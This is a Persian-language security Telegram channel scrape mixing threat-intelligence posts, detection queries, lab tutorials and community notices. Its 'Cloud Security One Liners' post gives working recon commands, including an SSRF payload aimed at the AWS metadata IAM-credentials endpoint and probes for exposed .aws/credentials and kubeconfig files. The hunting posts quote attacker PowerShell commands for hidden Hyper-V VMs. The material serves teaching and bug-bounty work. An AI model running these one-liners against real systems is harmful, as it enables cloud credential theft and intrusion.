🔖 امروز یک موضوع جالب دیگر را بررسی میکنیم که چگونه مهاجمان از هوش مصنوعی برای انجام وظایف مختلف استفاده میکنند این بار آنها از OpenAI Assistants API بهره بردهاند.
🕊 ادامه را در لینکدین مطالعه کنید :
🔗 https://lnkd.in/eKfp53Zt
🥀 @TryHackBox | @TryHackBoxOfficial
🕊 ادامه را در لینکدین مطالعه کنید :
🔗 https://lnkd.in/eKfp53Zt
🥀 @TryHackBox | @TryHackBoxOfficial
LinkedIn
#هوش_مصنوعی #هکر #امنیت_سایبری #بدافزار | TryHackBox Org
امروز یک موضوع جالب دیگر را بررسی میکنیم که چگونه مهاجمان از هوش مصنوعی برای انجام وظایف مختلف استفاده میکنند این بار آنها از OpenAI Assistants API بهره بردهاند.
مایکروسافت DART یک بدافزار جدید به نام SesameOp کشف کرده است که از OpenAI Assistants API…
مایکروسافت DART یک بدافزار جدید به نام SesameOp کشف کرده است که از OpenAI Assistants API…
🔥4
Try Hack Box
نگاهی به پست های قبل : لینک های پنهان: تحلیل خانواده های مخفی اپلیکیشن های VPN . پروژه جدیدمون چک لیست آسیبپذیری RCE مهندسی اجتماعی در ردتیمینگ تبهای مفید Burp Suite پنتست به روش «جعبهسفید» ماتریس تاکتیکهای MITRE ATT&CK تمام اندپوینت ها را از یک…
نگاهی به پست های قبل :
پیدا کردن paramهای پنهان در فایل های JavaScript
TryHackMe Course - Pre Security | قسمت 01
اکسپلویتهای خودکار توسط هوش مصنوعی
بررسی WAF در برابر RASP: قفل در مقابل محافظ داخلی! مقایسه کامل دو غول امنیت برنامههای تحت وب
مهندسی اجتماعی دروغپردازی سازمانیافته
تو جای هکر بودی، چه داستانی می ساختی؟
مینی دوره #رایگان راهنمای عملی تست نفوذ | قسمت اول مبانی شبکه برای پنتسترها | وایرشارک | WireShark
بررسی SQL Injection (SQLi) : Blind, Time-Based, Error-Based - بخش اول
باگ بانتی Mobile Hacking : چک لیست عملی
قسمت اول بوتکمپ SOC 0x4131!
قسمت دوم بوتکمپ SOC 0x4131!
آموزش Session Fixation and Hijacking
فاز اول ردتیم قسمت اول - قسمت دوم
۷ هک اصلی ترمینال که سرعت کارت را چند برابر میکند
قسمت سوم RadioZeroPod | داستان واقعی هک بانک با استفاده از روش های مهندسی اجتماعی
نکات Grep برای تحلیل جاوااسکریپت
چگونه مهاجمان از هوش مصنوعی برای انجام وظایف مختلف استفاده میکنند
برای آموزش های بیشتر به ما بپیوندید :
@TryHackBox | @TryHackBoxOfficial
پیدا کردن paramهای پنهان در فایل های JavaScript
TryHackMe Course - Pre Security | قسمت 01
اکسپلویتهای خودکار توسط هوش مصنوعی
بررسی WAF در برابر RASP: قفل در مقابل محافظ داخلی! مقایسه کامل دو غول امنیت برنامههای تحت وب
مهندسی اجتماعی دروغپردازی سازمانیافته
تو جای هکر بودی، چه داستانی می ساختی؟
مینی دوره #رایگان راهنمای عملی تست نفوذ | قسمت اول مبانی شبکه برای پنتسترها | وایرشارک | WireShark
بررسی SQL Injection (SQLi) : Blind, Time-Based, Error-Based - بخش اول
باگ بانتی Mobile Hacking : چک لیست عملی
قسمت اول بوتکمپ SOC 0x4131!
قسمت دوم بوتکمپ SOC 0x4131!
آموزش Session Fixation and Hijacking
فاز اول ردتیم قسمت اول - قسمت دوم
۷ هک اصلی ترمینال که سرعت کارت را چند برابر میکند
قسمت سوم RadioZeroPod | داستان واقعی هک بانک با استفاده از روش های مهندسی اجتماعی
نکات Grep برای تحلیل جاوااسکریپت
چگونه مهاجمان از هوش مصنوعی برای انجام وظایف مختلف استفاده میکنند
برای آموزش های بیشتر به ما بپیوندید :
@TryHackBox | @TryHackBoxOfficial
👍6
#ّگفتگو
در تجربه شما با استفاده از گزینه "Use suite scope" در ابزارهای تست امنیتی، چه چالشهایی را مواجه شدید و چگونه بر آنها غلبه کردید؟ آیا پس از فعال سازی این گزینه، بهبودی در عملکرد خود در شناسایی باگ ها مشاهده کردید؟ لطفاً مثالی از یک مورد خاص به اشتراک بگذارید. همچنین، آیا تفاوت های خاصی در روش های کار با این ابزارها با و بدون این گزینه مشاهده کردهاید و چگونه این تفاوتوها نتایج شما را تحت تأثیر قرار داده است؟ در نهایت، چه عواملی شما را به استفاده از "Use suite scope" تشویق کردند و آیا تصمیم دارید این روش را در آینده ادامه دهید؟ چرا؟
لینک گروه جهت مشارکت در این گفتگو :
#باگ_بانتی
در تجربه شما با استفاده از گزینه "Use suite scope" در ابزارهای تست امنیتی، چه چالشهایی را مواجه شدید و چگونه بر آنها غلبه کردید؟ آیا پس از فعال سازی این گزینه، بهبودی در عملکرد خود در شناسایی باگ ها مشاهده کردید؟ لطفاً مثالی از یک مورد خاص به اشتراک بگذارید. همچنین، آیا تفاوت های خاصی در روش های کار با این ابزارها با و بدون این گزینه مشاهده کردهاید و چگونه این تفاوتوها نتایج شما را تحت تأثیر قرار داده است؟ در نهایت، چه عواملی شما را به استفاده از "Use suite scope" تشویق کردند و آیا تصمیم دارید این روش را در آینده ادامه دهید؟ چرا؟
دوستان این بخشی از مطالب کتاب جدید ما هست و دوستانی که اشنایی با Use suite scope ندارند آشنا می شوند .
لینک گروه جهت مشارکت در این گفتگو :
https://t.me/+XPV3S0tygl1lZGE0
#باگ_بانتی
Telegram
TryHackBoxGp
بحث خارج از امنیت ممنوع
گپ پرسش و پاسخ
کانال ها :
@TryHackBox
@TryHackBoxOfficial
گپ پرسش و پاسخ
کانال ها :
@TryHackBox
@TryHackBoxOfficial
Forwarded from ⚔️ Ethical Hacking ⚔️ (Sajjad Teymouri)
🎉 تخفیف ویژه ۵۰٪ روی دورههای آموزشی؛ فرصتی عالی برای ورود جدی به دنیای SOC و امنیت سایبری
این دورهها بر اساس تجربه عملی در بازار کار و نیاز واقعی شرکتها طراحی شدهاند و تاکنون صدها ساعت آموزش کاربردی و مبتنی بر پروژه ارائه شده است.
1️⃣ دوره جامع SOC Tier 1 (بر اساس تجربیات عملی بازار کار)
2️⃣ دوره تخصصی SOC Tier 2 (مخصوص بازار کار – در حال برگزاری)
3️⃣ دوره جامع پیشنیازهای تست نفوذ (۹ دوره در یک مسیر کامل)
و...
برای مشاوره رایگان و ثبت نام با ایدی زیر در تلگرام در تماس باشید.
🆔 https://t.me/steymouri93
نکته : دوستانی که شرایط اقتصادی خوبی ندارند امکان خرید اقساطی هم براشون فراهم هست.
من با اکثر بچهها کنار میام ❤️
مارو به دوستاتون معرفی کنید.
🆔 @Sajjad_Teymouri
این دورهها بر اساس تجربه عملی در بازار کار و نیاز واقعی شرکتها طراحی شدهاند و تاکنون صدها ساعت آموزش کاربردی و مبتنی بر پروژه ارائه شده است.
1️⃣ دوره جامع SOC Tier 1 (بر اساس تجربیات عملی بازار کار)
2️⃣ دوره تخصصی SOC Tier 2 (مخصوص بازار کار – در حال برگزاری)
3️⃣ دوره جامع پیشنیازهای تست نفوذ (۹ دوره در یک مسیر کامل)
و...
برای مشاوره رایگان و ثبت نام با ایدی زیر در تلگرام در تماس باشید.
🆔 https://t.me/steymouri93
نکته : دوستانی که شرایط اقتصادی خوبی ندارند امکان خرید اقساطی هم براشون فراهم هست.
من با اکثر بچهها کنار میام ❤️
مارو به دوستاتون معرفی کنید.
🆔 @Sajjad_Teymouri
🤖 XBOW
🔖 — شماره ۱ جهان در H1
برای اولین بار، شکارچی باگ هوش مصنوعی خودران به صدر جدول جهانی رسید! و در حالی که تو هنوز به گذاشتن گیومه ادامه میدهی، باید بگویم که این نه گذشته است و نه آینده، بلکه اکنون است!
گروه جهت مشارکت در این گفتگو :
#باگ_بانتی
@TryHackBox | @TryHackBoxOfficial
🔖 — شماره ۱ جهان در H1
برای اولین بار، شکارچی باگ هوش مصنوعی خودران به صدر جدول جهانی رسید! و در حالی که تو هنوز به گذاشتن گیومه ادامه میدهی، باید بگویم که این نه گذشته است و نه آینده، بلکه اکنون است!
نظرتون راجب این چیه؟
گروه جهت مشارکت در این گفتگو :
https://t.me/+XPV3S0tygl1lZGE0
#باگ_بانتی
@TryHackBox | @TryHackBoxOfficial
🤔3🔥1
🔖 استفاده از ماشینهای مجازی برای بایپس کردن ابزارهای امنیتی روز به روز محبوب تر میشود. امروز به یک نمونه دیگر از پیادهسازی زیرتکنیک Hide Artifacts: Run Virtual Instance (T1564.006) نگاهی خواهیم انداخت.
بر اساس گزارش، مهاجم قابلیت Hyper-V را بر روی یک ماشین ویندوزی که به خطر افتاده بود، فعال کرد و سپس یک ماشین مجازی مبتنی بر Alpine Linux که حاوی بدافزار بود، دانلود و وارد کرد.
پس از دانلود، ماشین مجازی با استفاده از PowerShell وارد شد:
همچنین از PowerShell برای راهاندازی ماشین مجازی تازه وارد شده استفاده شد:
به عنوان مثال، میتوان به دنبال دستورات مربوط به مدیریت ماشین های مجازی گشت:
🕊 @TryHackBox | @TryHackBoxOfficial
#امنیت_سایبری
بر اساس گزارش، مهاجم قابلیت Hyper-V را بر روی یک ماشین ویندوزی که به خطر افتاده بود، فعال کرد و سپس یک ماشین مجازی مبتنی بر Alpine Linux که حاوی بدافزار بود، دانلود و وارد کرد.
پس از دانلود، ماشین مجازی با استفاده از PowerShell وارد شد:
"cmd.exe" /C powershell.exe -c import-vm -path "c:\\programdata\\microsoft\\AppV\\app\\Virtual Machines\\1DBCC80B-5803-4AF1-8772-712C688F408A.vmcx" -Copy -GenerateNewId > c:\\Programdata\\WindowsUpdateTask_t.tmp 2>&1
همچنین از PowerShell برای راهاندازی ماشین مجازی تازه وارد شده استفاده شد:
"cmd.exe" /C powershell.exe -c Start-VM -name WSL > c:\\Programdata\\WindowsUpdateTask_R.tmp 2>&1
به عنوان مثال، میتوان به دنبال دستورات مربوط به مدیریت ماشین های مجازی گشت:
event_type: "processcreatewin"
AND
proc_file_path: "powershell.exe"
AND
cmdline: ("import-vm" OR "start-vm")
آیا تا به حال با تکنیک های مشابه ای مواجه شدهاید؟ نظرات و تجربیات خود را به اشتراک بگذارید!
🕊 @TryHackBox | @TryHackBoxOfficial
#امنیت_سایبری
Bitdefender
Curly COMrades: Evasion and Persistence via Hidden Hyper-V Virtual Machines
I'd like to thank my coauthors Adrian Schipor and Martin Zugec for their invaluable contributions to this research.
❤5👍3
🔖 مهاجمان همچنان به آزمایش با پلتفرم های مختلف مدیریت از راه دور ادامه می دهند، بنابراین امروز یک مثال دیگر از ابزارهای دسترسی از راه دور را بررسی میکنیم: نرمافزار Desktop Remote (T1219.002).
به مورد UNK_SmudgedSerpent نگاه میکنیم. مهاجم از ایمیل های فیشینگ برای سرقت اطلاعات حساب کاربری و همچنین برای ارسال آرشیوهایی با فایل های MSI استفاده کرده است که RMM را بارگذاری میکنند.
در اکثر موارد، مهاجمان از PDQConnect نرمافزار نظارت و مدیریت از راه دور استفاده کردهاند.
اگر شما از این نرمافزار در زیرساخت خود استفاده نمیکنید، این می تواند تارگت خوبی برای شکار باشد:
همچنین میتوانید به دنبال دامنههای مرتبط بگردید:
🕊 @TryHackBox | 🥀 @TryHackBoxOfficial
#امنیت_سایبری
به مورد UNK_SmudgedSerpent نگاه میکنیم. مهاجم از ایمیل های فیشینگ برای سرقت اطلاعات حساب کاربری و همچنین برای ارسال آرشیوهایی با فایل های MSI استفاده کرده است که RMM را بارگذاری میکنند.
در اکثر موارد، مهاجمان از PDQConnect نرمافزار نظارت و مدیریت از راه دور استفاده کردهاند.
اگر شما از این نرمافزار در زیرساخت خود استفاده نمیکنید، این می تواند تارگت خوبی برای شکار باشد:
event_type: "processcreatewin"
AND
proc_file_productname: "PDQConnectAgent"
همچنین میتوانید به دنبال دامنههای مرتبط بگردید:
event_type: "dnsreqwin"
AND
dns_rname: "app.pdq.com"
نظرات خود را با ما به اشتراک بگذارید
🕊 @TryHackBox | 🥀 @TryHackBoxOfficial
#امنیت_سایبری
Proofpoint
Crossed wires: a case study of Iranian espionage and attribution | Proofpoint US
Proofpoint would like to thank Josh Miller for his initial research on UNK_SmudgedSerpent and contribution to this report. Key findings Between June and August 2025,
👍3❤2🕊1
🔖 مینی دوره #رایگان نصب و راهاندازی لابراتورهای تست نفوذ وب قسمت اول : DVWA، Juice Shop و VulnerableApp
توی این ویدئو نحوه نصب راحت و آسان سه تا لابراتوار فوق العاده برای تمرین گفتیم
🔗از لینک هایی که گذاشتیم میتونید برید و سر بزنید به اصل داکیومنت ها و بخونید
⚠️توصیه مهم ای که هست حتما سرویس ها رو بعد از استفاده خاموش کنید
"دست هاتون رو آلوده کنید و شروع کنید به تمرین تمرین تمرین"
🔗 https://youtu.be/G6jdNx5JHv4
ما رو در شبکه های زیر دنبال داشته باشید :
🥀 @TryHackBox | @TryHackBoxOfficial
Linkedin | YouTube | GitHub | Insta
#HomeLab #WebPentest #dvwa #docker
توی این ویدئو نحوه نصب راحت و آسان سه تا لابراتوار فوق العاده برای تمرین گفتیم
1 - dvwa : https://github.com/sagikazarmark/docker-dvwa
2 - juice shop : https://github.com/juice-shop/juice-shop
3 - VunlableApp : https://github.com/SasanLabs/VulnerableApp
🔗از لینک هایی که گذاشتیم میتونید برید و سر بزنید به اصل داکیومنت ها و بخونید
⚠️توصیه مهم ای که هست حتما سرویس ها رو بعد از استفاده خاموش کنید
"دست هاتون رو آلوده کنید و شروع کنید به تمرین تمرین تمرین"
🔗 https://youtu.be/G6jdNx5JHv4
انتقادی داشتید حتما اطلاع بدید، تا بتونیم آموزش با کیفیتتری ارائه بدیم،امیدواریم از آموزش لذت ببرید.
ما رو در شبکه های زیر دنبال داشته باشید :
🥀 @TryHackBox | @TryHackBoxOfficial
Linkedin | YouTube | GitHub | Insta
#HomeLab #WebPentest #dvwa #docker
👍8❤2
Forwarded from
AD Enumeration w SC - @TryHackBox.pdf
755.8 KB
🔖 در عملیات تیم قرمز، اغلب با پیادهسازی های داخلی VDI روبرو میشویم که دسترسی به اینترنت و شبکه خارجی ندارند، و به همین دلیل نمیتوانیم اسکریپت های PowerShell خود را برای شمارش AD و کاربران آن در سیستم های آسیبدیده دانلود کنیم.
در این آموزش، به بررسی این دستورات تک خطی میپردازیم که میتوانند به ما در شمارش AD کمک کنند.
توییتر بنده : https://www.x.com/kavehxnet
🥀🕊🖤
@KavehOffSec
#ردتیم
در بیشتر دوره های تیم قرمز، دانشجویان را تشویق می کنند تا از اسکریپت های PowerShell آماده برای شمارش محیط AD استفاده کنند، مانند powerview.ps1، که روشی بسیار مناسب و غیرپیچیده است. اما اگر این روش مناسب برای ما نامناسب شود و اجازه دانلود اسکریپتهای PowerShell یا هر ابزار دیگری از اینترنت در سیستم آسیبدیده را نداشته باشیم، چه باید کرد؟
اسکریپتهایی مانند Powerview.ps1 از توابع برای سادهسازی کارها استفاده میکنند. اما برخی از دستورات تک خطی وجود دارند که می توانند همان کار را در صورت عدم دسترسی به powerview انجام دهند.
در این آموزش، به بررسی این دستورات تک خطی میپردازیم که میتوانند به ما در شمارش AD کمک کنند.
توییتر بنده : https://www.x.com/kavehxnet
🥀🕊🖤
@KavehOffSec
#ردتیم
1👏3❤1🔥1
✎ Cloud Security One Liners
• AWS S3 Bucket Finder
• S3 Permission Check
• Firebase Database
• Azure Blob Storage
• GCP Storage
• AWS Metadata SSRF
• Cloud Credential Files
@TryHackBox | @TryHackBoxOfficial
#باگ_بانتی #کلاد 🕊🥀
• AWS S3 Bucket Finder
cat urls.txt | grep -oE "[a-zA-Z0-9.-]+\.s3\.amazonaws\.com" | anew s3_buckets.txt
cat urls.txt | grep -oE "s3://[a-zA-Z0-9.-]+" | anew s3_buckets.txt
• S3 Permission Check
cat s3_buckets.txt | xargs -I@ sh -c 'aws s3 ls s3://@ --no-sign-request 2>/dev/null && echo "OPEN: @"'
• Firebase Database
cat urls.txt | grep -oE "[a-zA-Z0-9-]+\.firebaseio\.com" | xargs -I@ curl -s @/.json | grep -v "null"
• Azure Blob Storage
cat urls.txt | grep -oE "[a-zA-Z0-9-]+\.blob\.core\.windows\.net" | anew azure_blobs.txt
• GCP Storage
cat urls.txt | grep -oE "storage\.googleapis\.com/[a-zA-Z0-9-]+" | anew gcp_buckets.txt
• AWS Metadata SSRF
cat urls.txt | gf ssrf | qsreplace "http://169.254.169.254/latest/meta-data/iam/security-credentials/" | httpx -silent -ms "AccessKeyId"
• Cloud Credential Files
cat alive.txt | httpx -silent -path /.aws/credentials,/.docker/config.json,/kubeconfig -mc 200 | anew cloud_creds.txt
@TryHackBox | @TryHackBoxOfficial
#باگ_بانتی #کلاد 🕊🥀
❤3
در این شرایط بحرانی، حفظ امنیت و سلامت خود و خانواده تان از اهمیت ویژه ای برخوردار است. لطفاً به دقت مراقب یکدیگر باشید و اقلام ضروری را تهیه کنید.
• ذخیره مواد غذایی خشک و غیرپرمصرف: حداقل یک هفته.
• آب آشامیدنی: سازمان های امدادی معمولاً 2–3 لیتر به ازای هر نفر در روز پیشنهاد میکنند (برای 3 روز = 6–9 لیتر برای هر نفر). بهتر است مطابق دستورالعمل های رسمی محاسبه کنید.
• سوخت: کافی برای 200–300 کیلومتر سفر یا بر اساس نیاز محلی؛ باک، بررسی وضعیت خودرو و حمل ابزار لازم.
• آمادگی برای قطع برق: چراغ قوه، باتری اضافی، پاوربانک، شارژر خورشیدی یا ژنراتور کوچک در صورت امکان.
• ارتباط آفلاین: نصب اپلیکیشن های معتبر برای پیام رسانی بدون اینترنت (قبل از بحران، قابلیتها و امنیتشان را بررسی کنید).
• همبستگی محلهای: کمک به سالمندان، جمعآوری داروهای ضروری، ذخیره دارایی نقدی کوچکی (پول نقد) و برنامه ریزی تماس های اضطراری.
مواظب خود و خانواده خود باشید
• ذخیره مواد غذایی خشک و غیرپرمصرف: حداقل یک هفته.
• آب آشامیدنی: سازمان های امدادی معمولاً 2–3 لیتر به ازای هر نفر در روز پیشنهاد میکنند (برای 3 روز = 6–9 لیتر برای هر نفر). بهتر است مطابق دستورالعمل های رسمی محاسبه کنید.
• سوخت: کافی برای 200–300 کیلومتر سفر یا بر اساس نیاز محلی؛ باک، بررسی وضعیت خودرو و حمل ابزار لازم.
• آمادگی برای قطع برق: چراغ قوه، باتری اضافی، پاوربانک، شارژر خورشیدی یا ژنراتور کوچک در صورت امکان.
• ارتباط آفلاین: نصب اپلیکیشن های معتبر برای پیام رسانی بدون اینترنت (قبل از بحران، قابلیتها و امنیتشان را بررسی کنید).
• همبستگی محلهای: کمک به سالمندان، جمعآوری داروهای ضروری، ذخیره دارایی نقدی کوچکی (پول نقد) و برنامه ریزی تماس های اضطراری.
مواظب خود و خانواده خود باشید
👍6❤2👎1
📣 ارسال لینک و فایل داخل گروه برای شرایط فعلی آزاد شد رفقا.
می تونید با هم ارتباط بگیرید و لینک و فایل کانفینگ و... تبادل کنید.
برای همتون آرزوی سلامتی دارم. به امید روزی که حال دل و.... هممون بهتر از گذشته باشه
t.me/TryHackBoxGroup 🔗
می تونید با هم ارتباط بگیرید و لینک و فایل کانفینگ و... تبادل کنید.
برای همتون آرزوی سلامتی دارم. به امید روزی که حال دل و.... هممون بهتر از گذشته باشه
t.me/TryHackBoxGroup 🔗
Telegram
TryHackBoxGp
بحث خارج از امنیت ممنوع
گپ پرسش و پاسخ
کانال ها :
@TryHackBox
@TryHackBoxOfficial
گپ پرسش و پاسخ
کانال ها :
@TryHackBox
@TryHackBoxOfficial
❤4
این سایت ها وایت لیست شدن چک کنید.
پیپ تست زدم نیم ساعت پیش کار کرد، صحت بقیه اطلاع ندارم
https://react.dev
http://ubuntu.com
http://Python.org
https://vercel.com/
https://nextjs.org/
https://sourceforge.net/
https://letsencrypt.org/
پیپ تست زدم نیم ساعت پیش کار کرد، صحت بقیه اطلاع ندارم
https://react.dev
http://ubuntu.com
http://Python.org
https://vercel.com/
https://nextjs.org/
https://sourceforge.net/
https://letsencrypt.org/
react.dev
React is the library for web and native user interfaces. Build user interfaces out of individual pieces called components written in JavaScript. React is designed to let you seamlessly combine components written by independent people, teams, and organizations.
👍6❤2👎1
سایت Lets encrypt داخل مرورگر باز میشه، اما امکان تمدید ssl با certbot همچنان مقدور نیست و ارور connection برمیگردونه
❤1👍1
مشخص نیست اختلال هست یا مرحله مرحله قراره حالت عادی برگردیم
آپدیت: اختلال بود و رفع شده
👍4👎1